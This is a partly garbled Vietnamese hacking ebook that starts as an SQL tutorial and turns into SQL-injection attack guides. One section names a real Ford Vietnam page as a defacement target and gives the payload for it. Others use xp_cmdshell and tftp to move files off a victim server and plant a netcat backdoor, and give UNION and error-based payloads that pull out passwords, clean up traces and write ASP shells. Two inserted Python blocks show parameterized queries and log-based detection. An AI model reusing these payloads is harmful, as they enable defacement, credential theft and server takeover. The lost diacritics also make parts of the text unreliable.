    This result is exactly what we want.

    HAVING...

    The HAVING... clause was added to SQL because the WHERE clause cannot be applied to aggregate functions (such as SUM). Without HAVING, we could not test a condition on aggregate functions.

    The syntax of HAVING is as follows:

    SELECT column_name, SUM(column_name) FROM table_name
    GROUP BY column_name
    HAVING SUM(column_name) condition value

    We reuse the Sales table above. The following SQL statement:

    SELECT Company, SUM(Amount) FROM Sales
    GROUP BY Company
    HAVING SUM(Amount) > 10000

    returns the result:

    Company    SUM(Amount)
    W3Schools  12600

    Aliases

    With SQL, aliases can be used for column names and table names.

    Column aliases:

    The syntax of a column alias is as follows:

    SELECT column_name AS column_alias FROM table_name

    Table aliases:

    A table alias has the following syntax:

    SELECT column_name FROM table_name AS table_alias

    Example using column aliases:

    We have the Persons table as follows:

    LastName   FirstName  Address       City
    Hansen     Ola        Timoteivn 10  Sandnes
    Svendson   Tove       Borgvn 23     Sandnes
    Pettersen  Kari       Storgt 20     Stavanger

    The following SQL statement:

    SELECT LastName AS Họ, FirstName AS Tên
    FROM Persons

    returns the result:

    Họ         Tên
    Hansen     Ola
    Svendson   Tove
    Pettersen  Kari

    DeFace with SQL injection, Basics

    (by sinhcv)

    FOR NEWBIE

    Hihi, let me continue. This article is still basics for newbies; anything more advanced is beyond me. Here I'll take the liberty of using Ford as the victim. The purpose of this article is to use the update, insert, drop, delete... statements in SQL to deFace.

    Create a file with the following content:

    TIM KIEM DIA DIEM JOB

    Save it as the file xx.html, then run it as follows:

    TIM KIEM: xxx
    DIA DIEM: 22
    JOB: 1' SQL command --

    Its database has the table Fordvn_news with the columns

    MessageId','Status','Priority','Subject','Lead','Img','Posted','Edited','Published','FromIp','Body','ReadCount'

    corresponding to its news page https://www.ford.com.vn/News/News.asp

    Here I choose the subject to deface, with messageid=146.

    OK then: these are the statements you need to know

    Insert into user ("id","pas") values (1,"xxx")-- /* add a user xxx to table user */
    update user set pass="xxxx" where id=1-- /* change the password of the user with id=1 */
    drop table user-- /* dangerous, deletes table user */
    drop database db-- /* very dangerous */
    delete from user where id=1-- /* delete column */
    ..............

    Here I use update

    QUOTE
    TIM KIEM: xxx
    DIA DIEM: 22
    JOB: 1' ;update fordvn_news set subject='TEST' where messageid=146--

    If you receive a message like this instead of an SQL error message, it has succeeded:

    QUOTE
    Không tìm được theo yêu cầu của bạn!

    OK come on

    https://www.ford.com.vn/News/News.asp

    You can do many more things than I can; this is only an example.

    Good luck !!!

    Hack server b SQL Injection

    ( Copyright by Windak )

    ( --Thanks bro Aclatinh and bro MRRO-- )

    1)T l thnh cng 80%:

    iu kin server phi l winnt v user dng inject l user c quyn dng xp_cmdshell(sa, dbo)

    check bn c th lm sau y trn inject link

    [injection link] %2b convert (int,(system_user())

    Nu KQ l sa hoc dbo c l bn c th tn cng c ri.

    Nu bn c sa hoc dbo nhng m admin li khng cho s dng cmdshell bn hy btn ln (bt th no t tm hiu nh )

    Lu : bn s ch hackc vo server cha database ca n thi (nhiu khi tdatabase chung vi host )

    Cc tool cn thit :

    tftpd32 , backdoor

    +++Mt vi kinh nghim hack, bit lnh DOS v mt cht hiu bit v network

    2) Tng bc tip cn

    a)Cc khi nim:

    Lu : Cch hack ny ca ti khng phi l mt chung nht, bi v cn rt nhiu cchkhc, cch ny ca ti hack thng qua giao thc TFTP.

    Ni sv giao thc TFTP :

    l mt giao thc truyn file serverclient . N hot ng tng t nh FTP nhngn gin hn nhiu , thng qua port 69, v mt u im, n khng cn password (y liu quan trng ta hack)

    Vo DOS g tftp /? -> Bn sc c php ca n nh sau :

    TFTP [-i] host PUT || GET filename [v tr file mun gi n]

    -i : nu bn cn truyn mt file dng binary hy s dng n

    host : IP ca my server

    PUT : nu bn mun send file

    GET : nu bn mun ly file

    V d v mt lnh tftp :

    Tftp i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe

    S ly file netcat.exe trn my server (my c IP xxx.) v chuyn vo C:\nc.exe trnmy client (my g lnh trn)

    By gita s test trc tip trn localhost. bn hy mtftpd32 ln bin my mnh thnhmt server tftp (lu phi tt ht firewall giao thc mi thc hin tt)

    Trong tftpd32 c phn BASE directory mc nh l [path to]\tftpd32e, n s l th mct cc file up hoc download ca bn khi thc hin trao i file vi client (v bn lserver) (bn c th change nu thch).

    Trong bi ny ti dng [link] thay cho link cc bn inject, hy chnh li cho ph hp run exec (thm (), ( nu cn )

    V dng thay cho Ip ca cc bn (n s hin th khi cc bn bt tftpd32)

    Tn cng thc s:

    -------------------------------BEGIN----------------------------------

    Command1 : RUN COMMAND DOS trn my victim :

    [link] exec master..xp_cmdshell [command]

    Command 2 : DOWNLOAD FILE t my victim

    [link] exec master..xp_cmdshell tftp PUT [path][filecandown]

    V d : Ly Ip my victim :

    (1)[link] exec master..xp_cmdshell ipconfig > a.txt

    (2)[link] exec master..xp_cmdshell tftp PUT a.txt

    ----Gii thch :

    (1) : run lnh ny : ipconfig >a.txt to file a.txt vi ni dung l kt qu ca lnhipconfig

    (2) : run tftp PUT a.txt chuyn file a.txt vi ni dung va to --> server (mychng ta )

    Command3 : UPLOAD BACKDOOR ln my victim :

    [link] exec master..xp_cmdshell tftp [i] GET backdoor [path muon backdoorct]

    v d : upload netcat vo C:\WINNT:

    [link] exec master..xp_cmdshell tftp i GET nc.exe C:\WINNT\nx.exe

    ----------------------------------END------------------------------

    3) Kt:

    Nh vy chng ta bit cch run command (bn c th run file exe ) , bit down, upfile, hu nh lm chc server ri y . Cn hack nhanh hay chm, hiu qu baonhiu l do bn

    ( Nu test thy li g xin lin hhttp://shacker.computed.net/baivet/nangcao/[email protected] )

    Chc hack vuiy

    vn SQL:

    Advanced SQL Injection Hacking

    Consider an SQL query:

    select id, forename, surname from authors

    Here 'id', 'forename' and 'surname' are columns of the table authors; when this query runs it returns every row in the table authors. Now look at the following query:

    select id, forename, surname from authors where forename = 'john' and surname = 'smith'

    This is a query with a condition, which needs no explanation: it returns everyone in the database with forename = 'john' and surname = 'smith'.

    So when the input value is not what the database expects:

    Forename: jo'hn

    Surname: smith

    The query becomes:

    select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'

    When this query is processed it raises an error:

    Server: Msg 170, Level 15, State 1, Line 1

    Line 1: Incorrect syntax near 'hn'.

    The reason is that we inserted a single quote "'", so the input becomes 'hn', which is invalid to the database, and an error is raised. An attacker can take advantage of this to delete your data as follows:

    Forename: jo'; drop table authors--

    The table authors is dropped -> dangerous, isn't it?

    Look at the following ASP code. This is a login form:

    Login Page

    Login

    Username:

    Password:

    This is the code of 'process_login.asp':

    p { font-size=20pt ! important}

    font { font-size=20pt ! important}

    h1 { font-size=64pt ! important}

    and password = '" + password + "'";

    trace( "query: " + sql );

    rso.open( sql, cn );

    if (rso.EOF)

    {

    rso.close();

    %>



    ACCESS DENIED

    ACCESS GRANTED


    Welcome,

    0)

    {

    Login( cn );

    }

    cn.close();

    }

    Main();

    %>

    This is the SQL query:

    var sql = "select * from users where username = '" + username + "'and password = '" +password + "'";

    If a hacker enters the following:

    Username: '; drop table users--

    Password:

    then the table 'users' is dropped. The login can also be bypassed; you all know the bypass already, so I will not repeat it (see the earlier article on the basics of hacking a website with an SQL injection flaw).

    In the username field the hacker can enter:

    Username: ' union select 1, 'fictional_user', 'some_password', 1--

    For example, the table users is created as follows:

    create table users( id int,

    username varchar(255),

    password varchar(255),

    privs int

    )

    and populated with:

    insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )

    insert into users values( 0, 'guest', 'guest', 0x0000 )

    insert into users values( 0, 'chris', 'password', 0x00ff )

    insert into users values( 0, 'fred', 'sesame', 0x00ff )
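The concatenated login query above, next to its parameterized form, as an added example that is not code from the ebook. It assumes an in-memory SQLite database standing in for SQL Server, the `users` schema shown above, and hypothetical function names; password hashing is left out because the page's schema stores plaintext.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the page's `users` table (SQLite, not SQL Server)."""
    cn = sqlite3.connect(":memory:")
    cn.execute("create table users(id int, username varchar(255),"
               " password varchar(255), privs int)")
    cn.executemany("insert into users values(?, ?, ?, ?)", [
        (0, "admin", "r00tr0x!", 0xFFFF),
        (0, "guest", "guest", 0x0000),
        (0, "chris", "password", 0x00FF),
        (0, "fred", "sesame", 0x00FF),
    ])
    return cn

def login_concatenated(cn, username, password):
    """The page's pattern: user input is pasted into the SQL text."""
    sql = ("select * from users where username = '" + username +
           "' and password = '" + password + "'")
    try:
        row = cn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Returning the driver error to the client is what feeds
        # the error-based enumeration described on this page.
        return "ERROR: " + str(exc)
    return "ACCESS GRANTED" if row else "ACCESS DENIED"

def login_parameterized(cn, username, password):
    """Hardened form: input is bound as data and errors stay server-side."""
    sql = "select * from users where username = ? and password = ?"
    try:
        row = cn.execute(sql, (username, password)).fetchone()
    except sqlite3.Error:
        return "ACCESS DENIED"  # log internally; never return driver text
    return "ACCESS GRANTED" if row else "ACCESS DENIED"

# Inputs quoted on the page, used here only to compare the two handlers.
UNION_INPUT = "' union select 1, 'fictional_user', 'some_password', 1--"
HAVING_INPUT = "' having 1=1--"

def compare():
    """Return {case: (concatenated result, parameterized result)}."""
    cn = make_db()
    results = {}
    for name, value in (("valid", "guest"), ("union", UNION_INPUT),
                        ("having", HAVING_INPUT)):
        pw = "guest" if name == "valid" else ""
        results[name] = (login_concatenated(cn, value, pw),
                         login_parameterized(cn, value, pw))
    return results

if __name__ == "__main__":
    for name, (weak, hardened) in compare().items():
        print(f"{name:7} concatenated={weak!r} parameterized={hardened!r}")
```

With bound parameters the quote never reaches the SQL parser, so the handler neither grants access nor produces an error message for the client to read.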

    An attacker learns the table and column names through a having 1=1 query:

    Username: ' having 1=1--

    The resulting error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is

    invalid in the select list because it is not contained in an aggregate

    function and there is no GROUP BY clause.

    /process_login.asp, line 35

    Continue to obtain the remaining ones:

    Username: ' group by users.id having 1=1--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'

    is invalid in the select list because it is not contained in either an

    aggregate function or the GROUP BY clause.

    /process_login.asp, line 35

    >> the column 'username' is now known

    ' group by users.id, users.username, users.password, users.privs having 1=1--

    Stop when no more errors are reported; the table and the columns of interest are now known. The next step is to obtain their values:

    To determine what a column holds, the sum() function is used:

    Username: ' union select sum(username) from users--

    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average

    aggregate operation cannot take a varchar data type as an argument.

    /process_login.asp, line 35

    The value of username is varchar; the reason needs no explanation. What about using it with id:

    Username: ' union select sum(id) from users--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL

    statement containing a UNION operator must have an equal number of

    expressions in their target lists.

    /process_login.asp, line 35

    So we can insert into the database:

    Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--

    Getting the server version:

    Username: ' union select @@version,1,1,1--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

    the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug

    6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise

    Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of

    data type int.

    /process_login.asp, line 35

    convert() can also be used, but I show union here. The contents of the users in the table can be read as follows:

    Username: ' union select min(username),1,1,1 from users where username > 'a'--

    This selects the smallest username value greater than 'a' -> an error is raised:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

    the varchar value 'admin' to a column of data type int.

    /process_login.asp, line 35

    So we know the account 'admin' exists. Continuing:

    Username: ' union select min(username),1,1,1 from users where username > 'admin'--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

    the varchar value 'chris' to a column of data type int.

    /process_login.asp, line 35

    Once a username is known -> get the password:

    Username: ' union select password,1,1,1 from users where username ='admin'--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

    the varchar value 'r00tr0x!' to a column of data type int.

    /process_login.asp, line 35

    This is a more advanced technique for obtaining the users:

    Create a script as follows:

    begin declare @ret varchar(8000)

    set @ret=':'

    select @ret=@ret+' '+username+'/'+password from users where

    username>@ret

    select @ret as ret into foo

    end

    -> the query:

    Username: '; begin declare @ret varchar(8000) set @ret=':' select

    @ret=@ret+' '+username+'/'+password from users where username>@ret

    select @ret as ret into foo end--

    This creates a table 'foo' with a single column 'ret'.

    Continue:

    Username: ' union select ret,1,1,1 from foo--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

    the varchar value ': admin/r00tr0x! guest/guest chris/password

    fred/sesame' to a column of data type int.

    /process_login.asp, line 35

    (Hnh nh mrro dng kiu ny vo VDC)

    Xo du vt:

    Username: '; drop table foo--

    Once an attacker controls the database, they want to go further and control the server's network as well. Some of the ways:

    1- Using xp_cmdshell when holding 'sa' rights

    2- Using xp_regread to read the registry, including the SAM

    3- Running linked queries on the server

    4- Creating scripts on the server to exploit

    5- Using 'bulk insert' to read any file on the system

    6- Using bcp to create text files on the server

    7- Using sp_OACreate, sp_OAMethod and sp_OAGetProperty to create (ActiveX) scripts that run on the server

    [xp_cmdshell]

    Chc cc bn cng nghe nhiu ri v d:

    exec master..xp_cmdshell 'dir'

    exec master..xp_cmdshell 'net1 user'

    S dng thi hnh cc lnh ca dos vvv.. rt hu hiu

    [xp_regread]

    Cc hm lin quan...

    xp_regaddmultistring

    xp_regdeletekey

    xp_regdeletevalue

    xp_regenumkeys

    xp_regenumvalues

    xp_regread

    xp_regremovemultistring

    xp_regwrite

    V d:

    exec xp_regread HKEY_LOCAL_MACHINE,

    'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'

    Xc inh null-session share c tn ti trn server

    exec xp_regenumvaluesHKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

    vv.. cn nhiu th na

    [Other Extended Stored Procedures]

    services:

    exec master..xp_servicecontrol 'start', 'schedule'

    exec master..xp_servicecontrol 'start', 'server'

    >ng qua cng bit n lm g...

    [Importing text files into tables]

    S dng 'bulk insert' chn text file vo th mc hin thi,to table n:

    create table foo( line varchar(8000) )

    tip tc:

    bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

    [Creating Text Files using BCP]

    VD:

    bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

    [ActiveX automation scripts in SQL Server]

    Dng 'wscript.shell'

    vd:

    declare @o int

    exec sp_oacreate 'wscript.shell', @o out

    exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

    Tren cu truy vn:

    Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod@o, 'run', NULL, 'notepad.exe'--

    Dng 'scripting.filesystemobject' c file:

    declare @o int, @f int, @t int, @ret int

    declare @line varchar(8000)

    exec sp_oacreate 'scripting.filesystemobject', @o out

    exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1

    exec @ret = sp_oamethod @f, 'readline', @line out

    while( @ret = 0 )

    begin

    print @line

    exec @ret = sp_oamethod @f, 'readline', @line out

    end

    To script ASP thi hnh command:

    declare @o int, @f int, @t int, @ret int

    exec sp_oacreate 'scripting.filesystemobject', @o out

    exec sp_oamethod @o, 'createtextfile', @f out,

    'c:\inetpub\wwwroot\foo.asp', 1

    exec @ret = sp_oamethod @f, 'writeline', NULL,

    ''

    y l nhng cch bn c th dng rt hiu qu,bn hy sng to thm cho mnh tnhng ch dn cbn ny.

    Sql Inject M lnh

    I am sure most of you here only know SQL injection as a login bypass. Today I would like to present techniques that do more than just get past the password of a site vulnerable to SQL injection.

    Note: most of what follows applies only to servers running MySQL or MSSQL; I am not sure about others.... If you do not know SQL yet, you should not read this article but study SQL first, OK? I do not want to see replies like "I don't understand any of this", "What went wrong?",.....

    1) Getting the current table and column names:

    Structure :

    Login page (or any injection page)::::

    username: ' having 1=1--

    Result: -------------------------------

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

    --------------------------------------

    ----> We now have the TABLE VICTIM

    Continuing:

    username: ' group by VICTIM.ID having 1=1--

    Result: ---------------------------------

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    -------------------------------------------

    So we have the column Vuser.

    2) UNION: small but effective

    Yes, we can use it to get almost everything.

    First, a brief word about its structure:

    Login page ::::

    username : ' Union select [column] from [table] where [column2=...]--

    password : everything

    Example: suppose we know that the username and password columns in the table VTABLE of the victim db are VUSER and VPASS; then we proceed as follows:

    username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1)

    password : everything

    (1): In this case admin is a user you already know; if you do not know one, it can be left blank and you will get the first user.

    Result: -----------------------------

    [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

    ---------------------------------

    If the result is as above, it means more columns must be added to the union until all columns of the table VTABLE are covered. Its structure is as follows:

    username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)

    password : everything

    Keep adding ",1" until the result looks something like:

    --------------------------------

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int.

    --------------------------------

    So the password of user 'admin' is 'tuibihackroi'.

    SQL injection is really interesting, and here is what it can do in today's article: take the other side's whole database.

    3) Getting all values of a known column in a known table

    The trick here is "Not in". Its structure is as follows (using the columns from the previous example):

    With Vuser being admin, the other users can be obtained:

    -----Login Page ::::::

    username: Union select Vuser,1,1,1,1 from Vtable where username not in(admin)

    -------------------------

    After that we obtain one more user, which is simply added to the Not in list (e.g. Not in (admin,hacker,.)); continuing this way yields every user (and, naturally, every password after that).

    **** To list user names according to a rule you choose, for example only users containing the word admin, use like. Structure:

    -----Login Page ::::::

    username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)

    like %admin%

    -------------------------

    4) Getting all tables and columns of the database:

    The key is this database table: INFORMATION_SCHEMA.TABLES with the column TABLE_NAME (holding all tables), and the table INFORMATION_SCHEMA.COLUMNS with the column COLUMN_NAME (holding all columns).

    Usage with Union:

    -----Login page :::::::

    username: UNION SELECT TABLE_NAME,1,1,1,1 FROMINFORMATION_SCHEMA.TABLES WHERE .

    ---------------------------

    This way all tables can be obtained; once a table is known, get all of its columns:

    -----Login page :::::::

    username: UNION SELECT COLUMN_NAME FROMINFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and

    ---------------------------

    These are the most basic points about SQL injection that I can offer. Whether you do well or not takes some creativity of your own; I hope this helps a little when you come across a site with an SQL injection flaw.

    5) Without UNION:

    If you are reluctant to use Union because of its inconveniences, "Convert" is an easier way to gather information through error messages.

    Structure :

    ---login page::::

    user : ' + convert (int,(select @@version))--

    -------------------------

    The above is an example that gets the version. To get any other information, just replace "select @@version"; but remember, if it is the first time you get the info, add TOP 1.

    vd: user : ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--

    Note: if this does not work, it may be because the + sign is not accepted; in that case replace it with %2b.

    vd: user : ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--

    6) Run command SQL :

    To run a command, use the ";" character.

    Structure :

    login page :::::

    user :' ; [command]--

    -----------------------------

    vd: '; DROP TABLE VTABLE--

    If you are fluent in SQL there is a lot that can be done with this, but I leave that part for you to study yourselves.
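For the defending side, the request patterns walked through in sections 1 to 6 (having 1=1, UNION probes, convert(int, ...) with + sent as %2b, stacked statements, extended stored procedures) can be flagged in web server logs. The following is an added example, not part of the ebook; the log format, the /login.asp path, the rule names and the sample lines are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructs the page walks through, grouped by what they indicate.
RULES = {
    "schema-enum":  re.compile(r"\bhaving\s+1\s*=\s*1|\binformation_schema\b"),
    "union-probe":  re.compile(r"\bunion\s+(all\s+)?select\b"),
    "error-cast":   re.compile(r"\bconvert\s*\(\s*int\s*,|@@version"),
    "stacked-stmt": re.compile(r";\s*(drop|insert|update|delete|declare|exec)\b"),
    "os-reach":     re.compile(r"\bxp_cmdshell\b|\bxp_reg\w+|\bsp_oa\w+|\bbulk\s+insert\b"),
}

def normalise(raw):
    """URL-decode twice (double encoding), lower-case, collapse whitespace."""
    text = unquote_plus(unquote_plus(raw))
    text = re.sub(r"/\*.*?\*/", " ", text)  # inline SQL comments used as spacers
    return re.sub(r"\s+", " ", text.lower())

def classify(query_string):
    """Return the sorted names of all rules matching one query string."""
    text = normalise(query_string)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(lines):
    """Return {client_ip: set(rule names)} for lines in 'ip method uri' form."""
    hits = defaultdict(set)
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) != 3 or "?" not in parts[2]:
            continue
        found = classify(parts[2].split("?", 1)[1])
        if found:
            hits[parts[0]].update(found)
    return dict(hits)

# Constructed sample log: documentation IP ranges, hypothetical paths.
SAMPLE_LOG = [
    "203.0.113.7 GET /login.asp?username=%27+having+1%3D1--&password=x",
    "203.0.113.7 GET /login.asp?username=%27+%2b+convert+(int,(select+@@version))--",
    "203.0.113.7 GET /login.asp?username=%27%3B+DROP+TABLE+VTABLE--",
    "198.51.100.4 GET /login.asp?username=alice&password=having+fun",
    "198.51.100.9 GET /search.asp?q=student+union+elections",
    "192.0.2.55 GET /login.asp?username=%2527%2520UNION%2520SELECT%2520"
    "TABLE_NAME%252C1%2520FROM%2520INFORMATION_SCHEMA.TABLES--",
]

if __name__ == "__main__":
    for ip, rules in sorted(scan(SAMPLE_LOG).items()):
        print(ip, sorted(rules))
```

A source that trips several rule classes in sequence, as the first address does here, matches the step-by-step enumeration described above far better than a single isolated hit.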

    Chm ht cun Ebook. Chc cc bn may mn. Hack ch l hc hi v